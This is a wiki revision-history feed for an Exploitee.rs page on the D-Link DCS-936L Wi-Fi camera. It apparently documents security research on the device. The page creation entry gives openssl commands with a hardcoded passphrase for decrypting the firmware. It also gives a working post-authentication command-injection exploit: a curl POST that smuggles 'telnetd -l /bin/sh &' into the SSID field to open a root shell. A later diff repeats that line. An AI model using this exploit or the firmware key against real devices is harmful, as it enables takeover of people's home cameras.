<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.exploitee.rs/index.php?action=history&amp;feed=atom&amp;title=DLink_936L</id>
	<title>DLink 936L - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.exploitee.rs/index.php?action=history&amp;feed=atom&amp;title=DLink_936L"/>
	<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;action=history"/>
	<updated>2026-05-07T09:17:49Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.0-alpha</generator>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2905&amp;oldid=prev</id>
		<title>Zenofex: Zenofex moved page DLink 936L​​ to DLink 936L</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2905&amp;oldid=prev"/>
		<updated>2017-08-11T03:31:36Z</updated>

		<summary type="html">&lt;p&gt;Zenofex moved page &lt;a href=&quot;/index.php?title=DLink_936L%E2%80%8B%E2%80%8B&quot; class=&quot;mw-redirect&quot; title=&quot;DLink 936L​​&quot;&gt;DLink 936L​​&lt;/a&gt; to &lt;a href=&quot;/index.php?title=DLink_936L&quot; title=&quot;DLink 936L&quot;&gt;DLink 936L&lt;/a&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 03:31, 11 August 2017&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;4&quot; class=&quot;diff-notice&quot; lang=&quot;en&quot;&gt;&lt;div class=&quot;mw-diff-empty&quot;&gt;(No difference)&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;!-- diff cache key gtvhack_wiki:diff:1.41:old-2882:rev-2905 --&gt;
&lt;/table&gt;</summary>
		<author><name>Zenofex</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2882&amp;oldid=prev</id>
		<title>Zenofex at 12:23, 10 August 2017</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2882&amp;oldid=prev"/>
		<updated>2017-08-10T12:23:33Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;en&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Older revision&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Revision as of 12:23, 10 August 2017&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l37&quot;&gt;Line 37:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Line 37:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;--data &amp;#039;wireless=1&amp;amp;security=0&amp;amp;encryption=0&amp;amp;wirelessBox=on&amp;amp;ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&amp;amp;mode=0&amp;amp;optSecurity=0&amp;amp;optEncryption=TKIP&amp;amp;key=&amp;amp;extAntenna=0&amp;amp;channel=6&amp;#039; \&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;--data &amp;#039;wireless=1&amp;amp;security=0&amp;amp;encryption=0&amp;amp;wirelessBox=on&amp;amp;ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&amp;amp;mode=0&amp;amp;optSecurity=0&amp;amp;optEncryption=TKIP&amp;amp;key=&amp;amp;extAntenna=0&amp;amp;channel=6&amp;#039; \&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;#039;http://10.255.255.1/eng/admin/adv_wireless.cgi&amp;#039;&amp;lt;/pre&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&amp;#039;http://10.255.255.1/eng/admin/adv_wireless.cgi&amp;#039;&amp;lt;/pre&amp;gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;=== Demo ===&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;{{#ev:youtube|-r6uFK--GLk}}&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key gtvhack_wiki:diff:1.41:old-2775:rev-2882:php=table --&gt;
&lt;/table&gt;</summary>
		<author><name>Zenofex</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2775&amp;oldid=prev</id>
		<title>Zenofex: Created page with &quot;__FORCETOC__ {{Disclaimer}} 160px Category:DLink DCS-936L  =DLink DCS-936L=  The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that...&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=DLink_936L&amp;diff=2775&amp;oldid=prev"/>
		<updated>2017-08-05T12:55:43Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;__FORCETOC__ {{Disclaimer}} &lt;a href=&quot;/index.php?title=File:DLINK_936L.jpg&quot; title=&quot;File:DLINK 936L.jpg&quot;&gt;left|thumb|160px&lt;/a&gt; &lt;a href=&quot;/index.php?title=Category:DLink_DCS-936L&amp;amp;action=edit&amp;amp;redlink=1&quot; class=&quot;new&quot; title=&quot;Category:DLink DCS-936L (page does not exist)&quot;&gt;Category:DLink DCS-936L&lt;/a&gt;  =DLink DCS-936L=  The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:DLINK_936L.jpg|left|thumb|160px]]&lt;br /&gt;
[[Category:DLink DCS-936L]]&lt;br /&gt;
&lt;br /&gt;
=DLink DCS-936L=&lt;br /&gt;
&lt;br /&gt;
The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that easily captures your entire room, wall-to-wall, in high-quality 720p. The built-in night vision, motion and sound detection, and a handy mobile app empower you with knowing exactly what is happening, day or night.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
[https://www.amazon.com/D-Link-HD-Wi-Fi-Camera-DCS-936L/dp/B01HO9XZR4/ref=as_li_ss_tl?s=electronics&amp;amp;ie=UTF8&amp;amp;qid=1501937652&amp;amp;sr=1-1&amp;amp;keywords=DLink+DCS-936L&amp;amp;linkCode=ll1&amp;amp;tag=exploiteers-20&amp;amp;linkId=270173eba3b2700cb65dc3fb2e5f6905 Purchase the DLink DCS-936L Camera at Amazon]&lt;br /&gt;
&lt;br /&gt;
==Encrypted Firmware Update==&lt;br /&gt;
&lt;br /&gt;
Firmware updates for the DCS-936L are encrypted with AES using a key, which is also encrypted.&lt;br /&gt;
&lt;br /&gt;
After unpacking the firmware package, use the following command to decrypt the AES key:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl rsautl -decrypt -in aes.key.rsa -inkey &amp;quot;p.key&amp;quot; -out aes.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finally, use the following two commands to decrypt the firmware packages:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl aes-128-cbc -k &amp;quot;s7.303%_4&amp;amp;%&amp;amp;oj9e&amp;quot; -nosalt -d -in update.aes -out &amp;quot;update&amp;quot; || exit&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl aes-128-cbc -k &amp;quot;s7.303%_4&amp;amp;%&amp;amp;oj9e&amp;quot; -nosalt -d -in update.bin.aes -out &amp;quot;update.bin&amp;quot; || exit&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Post Auth Root==&lt;br /&gt;
&lt;br /&gt;
Command Injection:&lt;br /&gt;
Post auth root via arbitrary command injection due to improper sanitization of the SSID field in the wifi configuration form.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;curl -i -s -k -v -X &amp;#039;POST&amp;#039; -H &amp;#039;Host: 10.255.255.1&amp;#039; \&lt;br /&gt;
-H Referer: http://10.255.255.1/eng/admin/adv_wireless.cgi \&lt;br /&gt;
-H &amp;#039;Cookie: language=eng; usePath=null&amp;#039; \&lt;br /&gt;
-H &amp;#039;Authorization: Basic &amp;lt;CREDS&amp;gt;&amp;#039; \&lt;br /&gt;
--data &amp;#039;wireless=1&amp;amp;security=0&amp;amp;encryption=0&amp;amp;wirelessBox=on&amp;amp;ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&amp;amp;mode=0&amp;amp;optSecurity=0&amp;amp;optEncryption=TKIP&amp;amp;key=&amp;amp;extAntenna=0&amp;amp;channel=6&amp;#039; \&lt;br /&gt;
&amp;#039;http://10.255.255.1/eng/admin/adv_wireless.cgi&amp;#039;&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Zenofex</name></author>
	</entry>
</feed>